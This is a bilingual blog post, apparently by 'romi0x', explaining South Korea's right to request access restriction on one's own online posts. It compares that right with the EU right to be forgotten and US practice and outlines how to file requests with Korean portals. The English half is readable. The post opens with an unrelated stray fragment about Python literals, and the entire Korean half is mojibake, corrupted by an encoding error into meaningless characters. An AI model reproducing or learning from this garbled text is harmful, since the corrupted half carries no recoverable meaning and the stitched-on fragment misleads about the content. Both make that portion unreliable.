(strings, bytes, numbers, tuples, lists, dicts, sets, booleans, None and Ellipsis)๋ง ์ฒ๋ฆฌํ ์ ์๋๋ก ๋ณด์ํ์ต๋๋ค.
Hello, this is romi0x!
Have you ever wanted to erase embarrassing moments from the internet? Or have you tried to delete a post but couldnโt find a way to remove it? Sometimes, you may not be able to delete your posts because there is no delete button or you are no longer a member of the service. To address this issue, there is a legal right called the โRight to Request Access Restriction for Personal Online Posts.โ
In this article, I will introduce the โRight to Request Access Restriction for Personal Online Postsโ, which allows individuals to request restrictions on public access to posts they have uploaded.
The โRight to Request Access Restriction for Personal Online Postsโ allows individuals to request restrictions on access to their own posts on the internet. This right ensures that information and communication service providers, as personal data controllers, comply with privacy protection principles, while allowing users to safeguard their personal data.
Since 2016, South Korea has introduced this right under the Act on Promotion of Information and Communications Network Utilization and Information Protection (the Information and Communications Network Act). Under this system, individuals can request access restrictions rather than deletion of their posts.
When it comes to online information deletion requests, South Koreaโs Right to Request Access Restriction for Personal Online Posts and the globally recognized โRight to Be Forgottenโ share similar goals but differ in legal application and scope.
In the European Union, there is a legal right called the โRight to Be Forgotten.โ This right was officially recognized in 2014 following a ruling by the Court of Justice of the European Union (CJEU) in the Google Spain case. The General Data Protection Regulation (GDPR), which took effect in 2018, explicitly defines this right.
One major case highlighting this right is:
While the EU shares similarities with Koreaโs system, European laws place a stronger emphasis on personal data protection.
The Right to Be Forgotten is not legally recognized in the United States. Instead, digital platforms offer users the ability to delete their own posts. For example, social media platforms like Facebook and Twitter allow users to remove their posts at any time. However, due to the strong emphasis on freedom of expression, content related to public figures or issues of public interest may not be easily removed.
Category | South Korea (Right to Request Access Restriction) | European Union (Right to Be Forgotten) | United States |
---|---|---|---|
Scope | Posts made by the individual | Includes third-party content | Limited personal data protection laws |
Deletion Process | Search restriction (post remains) | Search result removal & content deletion possible | Limited removal possible |
Legal Basis | Information and Communications Network Act | GDPR, CJEU rulings | Freedom of Expression, some state laws |
So, how can individuals in South Korea exercise this right and request access restrictions on their posts?
Users can exercise this right for posts they have made on online platforms, including comments, photos, and videos. If a deceased individual has designated a representative or if the family of the deceased requests access restriction, the request can still be made. If the designated representative and the family have differing opinions, the designated representativeโs decision generally takes precedence.
Any individual can submit a request, and it should be directed to the website administrator or search engine provider.
Once a request is made, website administrators and search engine providers must follow a review process to determine the appropriate action.
Once access restriction measures have been applied, the service provider must notify the requester of the result.
If a third party objects to the restriction, the service provider will review the submitted evidence and decide whether to uphold the restriction or lift it.
Major Korean portal sites Naver (N) and Daum (D) provide guidance on requesting access restriction:
์๋ ํ์ธ์, romi0x์์!
์ธํฐ๋ท์ ๋จ๊ฒจ์ง ๋ณธ์ธ์ ํ์ญ์ฌ๋ฅผ ์ง์ฐ๊ณ ์ถ์๋ ์ ์ด ์๋์? ํน์ ๊ฒ์๋ฌผ์ ์ญ์ ํ๋ ค ํ์ง๋ง ์ญ์ ํ ์ ์์๋ ๊ฒฝํ์ด ์๋์? ์๋น์ค ํ์์ ํํดํ๊ฑฐ๋ ๊ฒ์๋ฌผ ์ญ์ ๋ฒํผ์ด ์์ด์ ์ํ๋ ๊ฒ์๋ฌผ์ ์ญ์ ํ์ง ๋ชปํ๋ ์ํฉ์ด ์์ ์๋ ์์ด์. ์ด๋ฐ ์ํฉ์ ํด๊ฒฐํ๊ธฐ ์ํด โ์ธํฐ๋ท ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถโ์ด๋ผ๋ ๊ถ๋ฆฌ๊ฐ ์์ด์.
์ด๋ฒ ๊ธ์์๋ ๋ณธ์ธ์ด ์ฌ๋ฆฐ ๊ฒ์๋ฌผ์ ๋ํด ํ์ธ์ ์ ๊ทผ ๋ฐฐ์ ๋ฅผ ์์ฒญํ ์ ์๋ ๊ถ๋ฆฌ์ธ โ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถโ์ ๋ํด ์๊ฐํ ๊ฒ์.
์ถ์ฒ: https://biz.chosun.com/site/data/html_dir/2014/07/17/2014071700027.html
์ด์ฉ์ ๋ณธ์ธ์ด ์ธํฐ๋ท์์ ๊ฒ์ํ ๊ฒ์๋ฌผ์ ๋ํด ํ์ธ์ ์ ๊ทผ ๋ฐฐ์ ๋ฅผ ์์ฒญํ ์ ์๋ ๊ถ๋ฆฌ๋ฅผ โ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถโ์ด๋ผ๊ณ ํด์. ์ด ๊ถ๋ฆฌ๋ก ์ธํด ์ ๋ณดํต์ ์๋น์ค ์ ๊ณต์๋ ๊ฐ์ธ์ ๋ณด์ฒ๋ฆฌ์๋ก์ ๊ฐ์ธ์ ๋ณด ๋ณดํธ ์์น์ ์ค์ํ ์ ์๊ณ , ์ด์ฉ์๋ ๋ณธ์ธ์ ๊ฐ์ธ์ ๋ณด๋ฅผ ๋ณดํธํ๊ณ ์์ ํ๊ฒ ์งํฌ ์ ์์ด์.
ํ๊ตญ์์๋ 2016๋ ๋ถํฐ ์ ๋ณดํต์ ๋ง ์ด์ฉ์ด์ง ๋ฐ ์ ๋ณด๋ณดํธ ๋ฑ์ ๊ดํ ๋ฒ๋ฅ (์ ๋ณดํต์ ๋ง๋ฒ)์ ๋ฐ๋ผ ๊ฐ์ธ์ด ์์ ์ด ์์ฑํ ๊ฒ์๋ฌผ์ ๋ํด ๊ฒ์ ์ ํ์ ์์ฒญํ ์ ์๋ โ์ธํฐ๋ท ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถโ์ด ๋์ ๋์์ด์. ์ด๋ ๋ณธ์ธ์ด ์์ฑํ ๊ฒ์๋ฌผ์ด๋ผ ํ๋๋ผ๋ ์ญ์ ์์ฒญ์ด ์๋ โ์ ๊ทผ ์ ํโ ์กฐ์น๋ฅผ ์๊ตฌํ ์ ์๋๋ก ํ ์ ๋์์.
์ธํฐ๋ท์์ ์ ๋ณด ์ญ์ ์์ฒญ๊ณผ ๊ด๋ จํ์ฌ ํ๊ตญ์ โ์ธํฐ๋ท ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถโ๊ณผ ํด์ธ์์ ๋๋ฆฌ ๋ ผ์๋๋ โ์ํ ๊ถ๋ฆฌ(right to be forgotten)โ๋ ๊ณตํต๋ ๋ชฉ์ ์ ๊ฐ์ง๋ฉด์๋ ๋ฒ์ ์ ์ฉ ๋ฐฉ์๊ณผ ๋ฒ์์์ ์ฐจ์ด๋ฅผ ๋ณด์ฌ์.
์ ๋ฝ์ฐํฉ์์๋ โ์ํ์ง ๊ถ๋ฆฌ(Right to be Forgotten)โ๋ผ๋ ๋ฒ์ ๊ถ๋ฆฌ๊ฐ ์์ด์. 2014๋ ์ ๋ฝ์ฌ๋ฒ์ฌํ์(CJEU)์ ํ๊ฒฐ(๊ตฌ๊ธ ์คํ์ธ ์ฌ๊ฑด) ์ดํ ๊ณต์์ ์ผ๋ก ์ธ์ ๋์์ด์. ์ดํ 2018๋ ์ํ๋ ์ผ๋ฐ ๊ฐ์ธ์ ๋ณด ๋ณดํธ๋ฒ(GDPR)์์๋ ์ํ ๊ถ๋ฆฌ๋ฅผ ๋ช ์์ ์ผ๋ก ๊ท์ ํ๊ณ ์์ฃ .
์ฃผ์ ์ฌ๋ก๋ก๋ ๊ตฌ๊ธ ์คํ์ธ ์ฌ๊ฑด์ด ์์ด์.
์ ๋ฝ์ฐํฉ์์๋ ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถ๊ณผ ์ ์ฌํ ๊ฐ๋ ์ ๊ฐ์ง๊ณ ์์ง๋ง, ์ ๋ฝ์์๋ ๊ฐ์ธ์ ์ ๋ณด ๋ณดํธ๋ฅผ ๋ ๊ฐ์กฐํ๋ ๋ฒ์ ํ๊ฒฝ์ด์์.
๋ฏธ๊ตญ์ โ์ํ ๊ถ๋ฆฌโ๊ฐ ๋ฒ์ ์ผ๋ก ๋ณด์ฅ๋์ง ์์ง๋ง, ๊ฐ ๋์งํธ ํ๋ซํผ์์ ์ฌ์ฉ์์๊ฒ ๊ฒ์๋ฌผ ์ญ์ ๊ธฐ๋ฅ์ ์ ๊ณตํ๊ณ ์์ด์. ์๋ฅผ ๋ค์ด, ํ์ด์ค๋ถ์ด๋ ํธ์ํฐ์ ๊ฐ์ SNS ํ๋ซํผ์ ์ฌ์ฉ์๊ฐ ์์ ์ ๊ฒ์๋ฌผ์ ์ธ์ ๋ ์ง ์ญ์ ํ ์ ์๋๋ก ํ์ฉํ๊ณ ์์ด์. ํ์ง๋ง ๋ฏธ๊ตญ์์๋ ํํ์ ์์ ๊ฐ ์ค์์๋๋ฏ๋ก, ๊ณต์ ์ธ๋ฌผ์ ๊ฒ์๋ฌผ์ด๋ ๊ณต์ต์ ์ธ ๋ด์ฉ์ ๋ํด์๋ ์ญ์ ๊ฐ ์ ํ๋ ์ ์์ด์.
๊ตฌ๋ถ | ๊ตญ๋ด ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถ | ์ ๋ฝ์ฐํฉ(EU) | ๋ฏธ๊ตญ |
---|---|---|---|
์ ์ฉ ๋ฒ์ | ๋ณธ์ธ์ด ์์ฑํ ๊ฒ์๋ฌผ | ์ 3์๊ฐ ์ฌ๋ฆฐ ์ ๋ณด ํฌํจ | ์ผ๋ถ ๊ฐ์ธ์ ๋ณด ๋ณดํธ๋ฒ ์ ์ฉ |
์ญ์ ๋ฐฉ์ | ๊ฒ์ ์ ํ(๊ฒ์๋ฌผ์ ๋จ์ ์์) | ๊ฒ์ ๊ฒฐ๊ณผ ์ญ์ ๋ฐ ์ ๋ณด ์ญ์ ๊ฐ๋ฅ | ์ ํ์ ์ญ์ ๊ฐ๋ฅ |
๋ฒ์ ๊ทผ๊ฑฐ | ์ ๋ณดํต์ ๋ง๋ฒ | GDPR, ์ ๋ฝ์ฌ๋ฒ์ฌํ์ ํ๋ก | ํํ์ ์์ ์์น, ์ผ๋ถ ์ฃผ ๋ฒ๋ฅ |
๊ทธ๋ ๋ค๋ฉด, ๊ตญ๋ด์์ ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถ์ ์ด๋ป๊ฒ ์ ์ฒญํ๊ณ ์ด๋ค ๊ณผ์ ์ผ๋ก ์ฒ๋ฆฌ๋๋์ง ์์๋ณผ๊ฒ์.
๊ถ๋ฆฌํ์ฌ ๋์
์ ๋ณดํต์ ๋ง์ ํตํด ๋ณธ์ธ์ด ๊ฒ์ํ ๊ธ(๋๊ธ), ์ฌ์ง, ๋์์ ๋ฐ ์ด์ ์คํ๋ ๊ฒ์๋ฌผ์ ๋ํด์ ๊ถ๋ฆฌ๋ฅผ ํ์ฌํ ์ ์์ด์. ๋ง์ฝ ๊ณ ์ธ์ด ์์ ์ ๊ถ๋ฆฌ๋ฅผ ์์ํ ์ง์ ์ธ ๋๋ ๊ณ ์ธ์ ์ ์กฑ์ด ์ ๊ทผ๋ฐฐ์ ๋ฅผ ์์ฒญํ๋ ๊ฒฝ์ฐ์๋ ๊ถ๋ฆฌ๋ฅผ ํ์ฌํ ์ ์์ด์. ์ง์ ์ธ๊ณผ ์ ์กฑ์ ์๊ฒฌ์ด ๋ค๋ฅธ ๊ฒฝ์ฐ์๋ ํน๋ณํ ์ฌ์ ์ด ์๋ ํ ์ง์ ์ธ์ ์๊ฒฌ์ ๋ฐ๋ผ์.
๊ถ๋ฆฌํ์ฌ ์ฃผ์ฒด ๋ฐ ์๋๋ฐฉ
๊ถ๋ฆฌ๋ฅผ ํ์ฌํ๋ ์ฃผ์ฒด๋ ๋๊ตฌ๋ ์ง ๊ฐ๋ฅํ๋ฉฐ ๊ทธ ์๋๋ ๊ฒ์ํ ๊ด๋ฆฌ์ ๋๋ ๊ฒ์์๋น์ค ์ฌ์
์์์.
์์ฒญ ๋ฐฉ๋ฒ ๋ฐ ์ ์ฐจ
์์ฒญํ๋ ๋ฐฉ๋ฒ๊ณผ ์ ์ฐจ๋ ๋ค์๊ณผ ๊ฐ์์.
์ด์ฉ์๊ฐ ์ง์ ์ญ์ ํ๊ธฐ ์ด๋ ต๋ค๋ฉด, ๊ฒ์ํ ๊ด๋ฆฌ์์๊ฒ ์๊ธฐ๊ฒ์๋ฌผ์ ์ ๊ทผ๋ฐฐ์ ๋ฅผ ์์ฒญํด์.
์ด๋, ์์ฒญ ์ ์
์ฆ ์๋ฃ๋ค์ ์ฒจ๋ถํด์ผ ํด์.
๊ฒ์์๋น์ค ์ฌ์ ์์๊ฒ ๊ฒ์๋ชฉ๋ก์ ๋ฐฐ์ ๋ฅผ ์ถ๊ฐ์ ์ผ๋ก ์ํ๋ค๋ฉด, ๊ฒ์ํ ๊ด๋ฆฌ์์ ์ ๊ทผ๋ฐฐ์ ์กฐ์น ์ฌ์ค์ ์ ์ฆํ ์ ์๋ ์๋ฃ๋ฅผ ์ฒจ๋ถํด ๊ฒ์์๋น์ค ์ฌ์ ์์๊ฒ ๊ฒ์๋ชฉ๋ก ๋ฐฐ์ ์์ฒญ์ ํด์.
์ด์ฉ์๊ฐ ์ ๊ทผ๋ฐฐ์ ๋ฅผ ์์ฒญํ๋ค๋ฉด ๊ฒ์ํ ๊ด๋ฆฌ์์ ๊ฒ์์๋น์ค ์ฌ์ ์๋ ์ด๋ค ๋ฐฉ๋ฒ์ผ๋ก ์กฐ์น๋ฅผ ํด์ผํ ๊น์?
์ฌ์ ์๋ ์ด์ฉ์์ ์์ฒญ์ ๊ฒํ ํ ํ ์ ์ ํ ์กฐ์น๋ฅผ ์ทจํด์ผ ํด์. ๊ฒ์ํ ๊ด๋ฆฌ์๋ ์์ฒญ์ธ์ด ์ ์ถํ ์ ์ฆ์๋ฃ๋ฅผ ์ข ํฉ์ ์ผ๋ก ๊ณ ๋ คํด ํด๋น ๊ฒ์๋ฌผ์ ๋ํ ๋ธ๋ผ์ธ๋ ์ฒ๋ฆฌ ๋ฑ์ผ๋ก ์ ๊ทผ๋ฐฐ์ ์กฐ์น๋ฅผ ์ค์ํด์ผ ํด์. ๊ฒ์์๋น์ค ์ฌ์ ์๋ ๊ฒ์๋ชฉ๋ก์์ ๋ฐฐ์ ํ๋ ๋ฐฉ์์ผ๋ก ์กฐ์น๋ฅผ ์ทจํด์ผ ํด์.
์ฌ์ ์๋ ์ ๊ทผ๋ฐฐ์ ์กฐ์น๋ฅผ ์๋ฃํ ๊ฒฝ์ฐ ์์ฒญ์ธ์๊ฒ ๊ฒฐ๊ณผ๋ฅผ ํต๋ณดํด์ผ ํด์. ๋ํ, ์ 3์๊ฐ ์ด์ ๋ํ ์ด์๋ฅผ ์ ๊ธฐํ ์ ์์ด์. ์ด ๊ฒฝ์ฐ, ์ฌ์ ์๋ ์์ฒญ์ธ์ ์ ์ฆ์๋ฃ๋ฅผ ๊ฒํ ํ ํ ์ด์ ์ ์ฒญ์ ๋ฐ์๋ค์ผ์ง ๊ฒฐ์ ํด์ผ ํด์.
๊ตญ๋ด ์ ๋ช ํฌํธ์ฌ์ดํธ N์ฌ์ D์ฌ๋ ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถ์ ์๋ดํ๊ณ ์์ด์.
N์ฌ์ ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ ์๋ด
D์ฌ์ ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ ์๋ด
๊ฐ์ธ์ ๋ณด๋ณดํธ์์ํ ใ์ธํฐ๋ท ์๊ธฐ๊ฒ์๋ฌผ ์ ๊ทผ๋ฐฐ์ ์์ฒญ๊ถ ์๋ด์ใ 2024.12